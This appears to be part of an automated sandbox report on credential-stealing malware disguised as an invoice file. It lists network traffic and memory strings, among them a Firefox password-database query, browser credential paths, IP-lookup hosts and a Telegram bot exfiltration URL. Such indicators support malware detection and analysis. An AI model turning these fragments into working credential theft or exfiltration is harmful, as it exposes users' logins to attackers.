                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                            Source: hawkgoods.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                            Source: vbc.exe, 00000012.00000003.306146332.000000000238B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://www.bing.com/orgid/idtoken/nosigninhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=351a037b-0597-47d9-b2c1-bfb1c870bba0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%223B109BCA2CB841A781265B1D219195C1%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=
                            Source: vbc.exe, 00000012.00000003.306146332.000000000238B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://www.bing.com/orgid/idtoken/nosigninhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=351a037b-0597-47d9-b2c1-bfb1c870bba0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%223B109BCA2CB841A781265B1D219195C1%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=
                            Source: unknownDNS traffic detected: queries for: 69.170.12.0.in-addr.arpa
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/HBFl
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: powershell.exe, 00000003.00000002.378127949.000000000088E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                            Source: powershell.exe, 00000003.00000002.377998642.00000000007E6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: http://csARxe.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com(
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                            Source: Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngL
                            Source: powershell.exe, 00000003.00000002.381287871.0000000004841000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: PO_Invoices_pdf.exe, PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                            Source: hawkgoods.exeString found in binary or memory: http://whatismyipaddress.com/
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlL
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250459528.0000000006513000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.R
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                            Source: hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comY
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma3
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceto
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdV
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdsed
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnR
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnT
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cniac
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.256526982.0000000006539000.00000004.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr9
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krF
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/l
                            Source: hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251741662.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com-mq
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn-u
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                            Source: hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.249778536.0000000006512000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com-cz
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.247998925.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net-d
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net-siu
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248099180.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netn
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netx
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnaN
                            Source: vbc.exe, 00000012.00000003.306146332.000000000238B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
                            Source: origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/PesterL
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26
                            Source: hawkgoods.exeString found in binary or memory: https://login.yahoo.com/config/login
                            Source: powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                            Source: Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: Matiexgoods.exe, 00000008.00000002.694705884.0000000001823000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: hawkgoods.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
